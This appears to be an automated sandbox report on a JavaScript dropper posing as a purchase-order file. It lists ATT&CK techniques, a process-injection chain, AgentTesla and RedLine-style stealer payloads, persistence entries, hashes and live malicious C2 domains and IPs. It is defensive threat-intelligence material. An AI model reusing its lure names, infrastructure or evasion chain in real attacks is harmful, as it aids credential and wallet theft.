Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 1 Windows Service; 212 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; At; Cron; Launchd
Defense Evasion: 111 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 2 Valid Accounts; 341 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection; Stripped Payloads
Credential Access: 2 OS Credential Dumping; 221 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: 2 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 228 System Information Discovery; 1 Query Registry; 541 Security Software Discovery; 341 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: 11 Archive Collected Data; 3 Data from Local System; 1 Email Collection; 221 Input Capture; 4 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: 2 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 1 Data Encoding; 2 Non-Application Layer Protocol; 123 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
Behavior Graph ID: 1519256; Sample: RFQ -PO.20571-0001-QBMS-PRQ...; Startdate: 26/09/2024; Architecture: WINDOWS; Score: 100. Numbers in square brackets are the graph's process node ids; a count in parentheses after a process name is the created registry value / file count shown on that node.

Start [2]
• DNS/IP: s82.gocheapweb.com; pywolwnvd.biz; api.ipify.org
• Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
• Started: wscript.exe [15] (1 2); TrojanAIbot.exe [19]; TrojanAIbot.exe [21]

wscript.exe [15]
• Dropped: C:\Users\user\AppData\Local\Temp\x.exe, PE32
• Signatures: Benign windows process drops PE files; Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
• Started: x.exe [23] (1)

x.exe [23]
• Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Switches to a custom stack to bypass stack traces
• Started: x.exe [26]; svchost.exe [28]

x.exe [26] started: x.exe [30]; svchost.exe [32]
x.exe [30] started: x.exe [34]; svchost.exe [36]
x.exe [34] started: x.exe [38]; svchost.exe [40]
x.exe [38] started: x.exe [42]; svchost.exe [45]

x.exe [42]
• Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
• Started: svchost.exe [47] (5)

svchost.exe [47]
• Dropped: C:\Users\user\AppData\...\server_BTC.exe, PE32; C:\Users\user\AppData\Local\...\neworigin.exe, PE32; C:\Users\user\AppData\Local\Temp\build.exe, PE32
• Started: server_BTC.exe [50] (7); neworigin.exe [54]; build.exe [57]

server_BTC.exe [50]
• Dropped: C:\Users\user\AppData\...\TrojanAIbot.exe, PE32
• Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
• Started: powershell.exe [59]

neworigin.exe [54]
• DNS/IP: s82.gocheapweb.com 51.195.88.199, ports 587, 62828, 62829, OVHFR, France; api.ipify.org 104.26.13.205, ports 443, 62826, CLOUDFLARENETUS, United States
• Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 2 other signatures

build.exe [57]
• DNS/IP: 212.162.149.53, ports 2049, 62827, UNREAL-SERVERSUS, Netherlands
• Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets

powershell.exe [59]
• Signatures: Loading BitLocker PowerShell Module

Source | Detection | Scanner | Label
RFQ -PO.20571-0001-QBMS-PRQ-0200140.js | 24% | ReversingLabs | Script-JS.Trojan.Heuristic
RFQ -PO.20571-0001-QBMS-PRQ-0200140.js | 100% | Avira | JS/TrojanDropper.MA

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\server_BTC.exe | 100% | Avira | HEUR/AGEN.1311721
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | 100% | Avira | HEUR/AGEN.1311721
C:\Users\user\AppData\Local\Temp\x.exe | 100% | Avira | HEUR/AGEN.1321671
C:\Users\user\AppData\Local\Temp\neworigin.exe | 100% | Avira | TR/Spy.Gen8
C:\Users\user\AppData\Local\Temp\build.exe | 100% | Avira | TR/AD.RedLineSteal.dzdht
C:\Users\user\AppData\Local\Temp\server_BTC.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\x.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\neworigin.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\build.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\build.exe | 92% | ReversingLabs | Win32.Ransomware.RedLine
C:\Users\user\AppData\Local\Temp\neworigin.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\server_BTC.exe | 83% | ReversingLabs | ByteCode-MSIL.Infostealer.ClipBanker
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | 83% | ReversingLabs | ByteCode-MSIL.Infostealer.ClipBanker

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://api.ipify.org/ | 0% | URL Reputation | safe
212.162.149.53:2049 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pywolwnvd.biz | 54.244.188.177 | true | false | - | unknown
api.ipify.org | 104.26.13.205 | true | false | - | unknown
s82.gocheapweb.com | 51.195.88.199 | true | true | - | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | URL Reputation: safe | unknown
212.162.149.53:2049 | true | Avira URL Cloud: safe | unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
51.195.88.199 | s82.gocheapweb.com | France | 16276 | OVHFR | true
212.162.149.53 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | true
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1519256
                                      Start date and time:2024-09-26 09:20:12 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 11m 24s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:36
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • GSI enabled (Javascript)
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:RFQ -PO.20571-0001-QBMS-PRQ-0200140.js
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winJS@48/18@3/3
                                      EGA Information:
                                      • Successful, ratio: 90%
                                      HCA Information:
                                      • Successful, ratio: 95%
                                      • Number of executed functions: 55
                                      • Number of non-executed functions: 302
                                      Cookbook Comments:
                                      • Found application associated with file extension: .js
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target server_BTC.exe, PID 6832 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • VT rate limit hit for: RFQ -PO.20571-0001-QBMS-PRQ-0200140.js
Time | Type | Description
03:21:43 | API Interceptor | 19x Sleep call for process: powershell.exe modified
03:21:43 | API Interceptor | 812142x Sleep call for process: neworigin.exe modified
03:21:45 | API Interceptor | 265971x Sleep call for process: TrojanAIbot.exe modified
03:21:58 | API Interceptor | 23x Sleep call for process: build.exe modified
09:21:44 | Task Scheduler | Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
09:21:46 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
Match (IP) | Associated Sample Name / URL | Threat Name | Context (Detection: malicious for every row)

104.26.13.205
• SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe | Unknown | api.ipify.org/
• file.exe | LummaC, Vidar | api.ipify.org/
• file.exe | LummaC, Stealc, Vidar | api.ipify.org/
• file.exe | LummaC, Stealc, Vidar | api.ipify.org/
• file.exe | LummaC, Stealc, Vidar | api.ipify.org/
• file.exe | Unknown | api.ipify.org/
• file.exe | Unknown | api.ipify.org/
• file.exe | LummaC, Vidar | api.ipify.org/
• fptlVDDPkS.dll | Quasar | api.ipify.org/
• vstdlib_s64.dll.dll | Quasar | api.ipify.org/

51.195.88.199
• ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd | AgentTesla, DBatLoader
• RFQ_PO_KMM7983972_ORDER_DETAILS.js | AgentTesla, RedLine
• ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd | AgentTesla, DBatLoader
• NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE | AgentTesla, RedLine
• Order SMG 201906 20190816orderGMD#0498366Deta.exe | AgentTesla, RedLine
• RFQPO3D93876738.scr.exe | AgentTesla, RedLine, XWorm
• ORDERDATASHEET#PO8738763.scr.exe | AgentTesla, RedLine, SugarDump, XWorm
• Request for Quotation.js | AgentTesla
• Revised_June_Order_Document#po839203.js | AgentTesla, SugarDump, XWorm

212.162.149.53
• RFQ_PO-WDX73892970.vbs | RedLine
• RFQ_PO_KMM7983972_ORDER_DETAILS.js | AgentTesla, RedLine
• NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE | AgentTesla, RedLine
• yB576bM3Ll.exe | RedLine
Match (Domain) | Associated Sample Name / URL | Threat Name | Context (Detection: malicious for every row)

s82.gocheapweb.com
• ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd | AgentTesla, DBatLoader | 51.195.88.199
• RFQ_PO_KMM7983972_ORDER_DETAILS.js | AgentTesla, RedLine | 51.195.88.199
• ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd | AgentTesla, DBatLoader | 51.195.88.199
• NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE | AgentTesla, RedLine | 51.195.88.199
• Order SMG 201906 20190816orderGMD#0498366Deta.exe | AgentTesla, RedLine | 51.195.88.199
• RFQPO3D93876738.scr.exe | AgentTesla, RedLine, XWorm | 51.195.88.199
• ORDERDATASHEET#PO8738763.scr.exe | AgentTesla, RedLine, SugarDump, XWorm | 51.195.88.199
• Request for Quotation.js | AgentTesla | 51.195.88.199
• Revised_June_Order_Document#po839203.js | AgentTesla, SugarDump, XWorm | 51.195.88.199
• RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 141.95.47.215

api.ipify.org
• Telco 32pcs New Purchase Order.exe | AgentTesla | 104.26.12.205
• https://lmoriw-iekascma-oqmmcq-213-cmakwe-fgacsax.pages.dev/robots.txt/ | HTMLPhisher | 104.26.13.205
• INDIA - VSL PARTICULARS.pdf.exe | AgentTesla | 104.26.12.205
• http://limeac-oawkcc-otmsesrt-iond0-minestoasli.pages.dev/ | HTMLPhisher | 172.67.74.152
• https://dreativityblocksnodes.pages.dev/ | Unknown | 172.67.74.152
• https://check-smulti-993054.pages.dev/ | HTMLPhisher | 172.67.74.152
• file.exe | LummaC, Vidar | 104.26.12.205
• SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe | Unknown | 104.26.13.205
• SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe | Unknown | 104.26.12.205
• file.exe | LummaC, Vidar | 172.67.74.152

pywolwnvd.biz
• ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd | AgentTesla, DBatLoader | 54.244.188.177
• RFQ_PO_KMM7983972_ORDER_DETAILS.js | AgentTesla, RedLine | 54.244.188.177
• ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd | AgentTesla, DBatLoader | 54.244.188.177
• TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe | FormBook | 54.244.188.177
• NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE | AgentTesla, RedLine | 54.244.188.177
• TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe | FormBook, LummaC Stealer | 54.244.188.177
• Original Shipment Document_PDF_.exe | FormBook | 54.244.188.177
• Payment Advice - Advice RefGLV626201911]Priority payment Customer_PDF_.exe | FormBook | 54.244.188.177
• Quotation.exe | Remcos | 54.244.188.177
• Bank Form.scr.exe | DarkTortilla, FormBook | 54.244.188.177
                                                                Associated Sample Name / URL | Detection | Threat Name | Context
                                                                Match: UNREAL-SERVERSUS
                                                                1DUCJGrpyb.exe | malicious | Remcos | 204.10.160.136
                                                                C8G355qROx.hta | malicious | Cobalt Strike, Remcos | 204.10.160.136
                                                                TT4729920DBO.xls | malicious | Remcos | 204.10.160.136
                                                                RFQ_PO-WDX73892970.vbs | malicious | RedLine | 212.162.149.53
                                                                RFQ_PO_KMM7983972_ORDER_DETAILS.js | malicious | AgentTesla, RedLine | 212.162.149.53
                                                                KZ710-0038.exe | malicious | Remcos, GuLoader | 162.251.122.106
                                                                SKMBT88122024816310TD01202817311 .vbs | malicious | Remcos | 212.162.149.163
                                                                SKMBT_77122024816310TD01_20220128_17311 .vbs | malicious | Remcos | 212.162.149.163
                                                                RFQASTM36QTY1000MTOrder.exe | malicious | RedLine | 204.10.160.212
                                                                Z0055 Zhixing Construction Engineering Pte. Ltd..exe | malicious | RedLine | 212.162.149.159
                                                                Match: CLOUDFLARENETUS
                                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
                                                                Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
                                                                450230549.exe | malicious | AgentTesla | 162.159.134.233
                                                                64.exe | malicious | Unknown | 162.159.61.3
                                                                450230549.exe | malicious | Unknown | 162.159.134.233
                                                                PO-100001499.exe | malicious | FormBook | 188.114.96.3
                                                                ADNOC requesting RFQ.exe | malicious | FormBook | 104.21.64.108
                                                                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 188.114.96.3
                                                                https://qwehikd-asdu.xyz/ | malicious | Unknown | 188.114.96.3
                                                                https://geminishdw-dws.top/ | malicious | Unknown | 188.114.97.3
                                                                Match: OVHFR
                                                                https://docs-i-trezor.github.io/en-us/ | malicious | HTMLPhisher | 46.105.222.162
                                                                https://is.gd/fxcRir | malicious | Unknown | 51.77.64.70
                                                                https://cancelar-plan-pr0teccion1.w3spaces.com/ | malicious | Unknown | 54.38.113.6
                                                                https://telstra-104752.weeblysite.com/ | malicious | HTMLPhisher | 51.89.9.254
                                                                https://pancakes.multiinx.com/ | malicious | Unknown | 147.135.222.233
                                                                https://simplescalingdefender.pages.dev/ | malicious | Unknown | 54.38.113.3
                                                                http://rewardsforyoutoclaim.pages.dev/ | malicious | Unknown | 51.89.9.252
                                                                http://rewards-tokss-foryou.pages.dev/ | malicious | Unknown | 5.135.209.104
                                                                https://fastsoluudapppmigratee.com/ | malicious | Unknown | 178.32.197.53
                                                                https://sucursal-virtual03.w3spaces.com/ | malicious | Unknown | 54.38.113.2
                                                                Associated Sample Name / URL | Detection | Threat Name | Context
                                                                Match: 3b5074b1b5d032e5620f69f9f700ff0e
                                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 104.26.13.205
                                                                450230549.exe | malicious | AgentTesla | 104.26.13.205
                                                                450230549.exe | malicious | Unknown | 104.26.13.205
                                                                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 104.26.13.205
                                                                https://geminiqwc-sw.top/ | malicious | Unknown | 104.26.13.205
                                                                http://tiktok1688.cc/ | malicious | Unknown | 104.26.13.205
                                                                https://qwekorqw-eqo.top/ | malicious | Unknown | 104.26.13.205
                                                                https://qwoms-dei3.top/ | malicious | Unknown | 104.26.13.205
                                                                http://cmn.pkgu192.vip/ | malicious | Unknown | 104.26.13.205
                                                                http://frt.asan192.vip/ | malicious | Unknown | 104.26.13.205
                                                                Associated Sample Name / URL | Detection | Threat Name
                                                                Match: C:\Users\user\AppData\Local\Temp\build.exe
                                                                RFQ_PO-WDX73892970.vbs | malicious | RedLine
                                                                RFQ_PO_KMM7983972_ORDER_DETAILS.js | malicious | AgentTesla, RedLine
                                                                NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE | malicious | AgentTesla, RedLine
                                                                Match: C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd | malicious | AgentTesla, DBatLoader
                                                                RFQ_PO_KMM7983972_ORDER_DETAILS.js | malicious | AgentTesla, RedLine
                                                                ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd | malicious | AgentTesla, DBatLoader
                                                                NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE | malicious | AgentTesla, RedLine
                                                                Order SMG 201906 20190816orderGMD#0498366Deta.exe | malicious | AgentTesla, RedLine
                                                                                Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):410
                                                                                Entropy (8bit):5.361827289088002
                                                                                Encrypted:false
                                                                                SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                Process:C:\Users\user\AppData\Local\Temp\build.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):3094
                                                                                Entropy (8bit):5.33145931749415
                                                                                Encrypted:false
                                                                                SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                MD5:3FD5C0634443FB2EF2796B9636159CB6
                                                                                SHA1:366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
                                                                                SHA-256:58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
                                                                                SHA-512:8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):410
                                                                                Entropy (8bit):5.361827289088002
                                                                                Encrypted:false
                                                                                SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):2220
                                                                                Entropy (8bit):5.379753225343802
                                                                                Encrypted:false
                                                                                SSDEEP:48:eWSU4xympjgs4Rc9tEoUl8NPryHl7u1iMugeC/ZM0Uyu+d:eLHxvCsIcnSKjyFOugw1K
                                                                                MD5:46EC557BA396F88FA6818DC45FB86905
                                                                                SHA1:8DF141A36E6CDD6FA71C23887D04BC14BDF220D1
                                                                                SHA-256:5DEF590FCF190165C09781C3E6EF72B697EE7BC4909D7ACBB6273262FD28AEA3
                                                                                SHA-512:0368E155D4CDEF49EED80160E2CC1DE5688A914EB54A478E30DEEA2F8A3B53FFD86762583F316193393D3F80F926CB20277C6BB53D4C34D01CA692F17DE53581
                                                                                Malicious:false
                                                                                Preview:@...e................................................@..........P................1]...E.....i.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
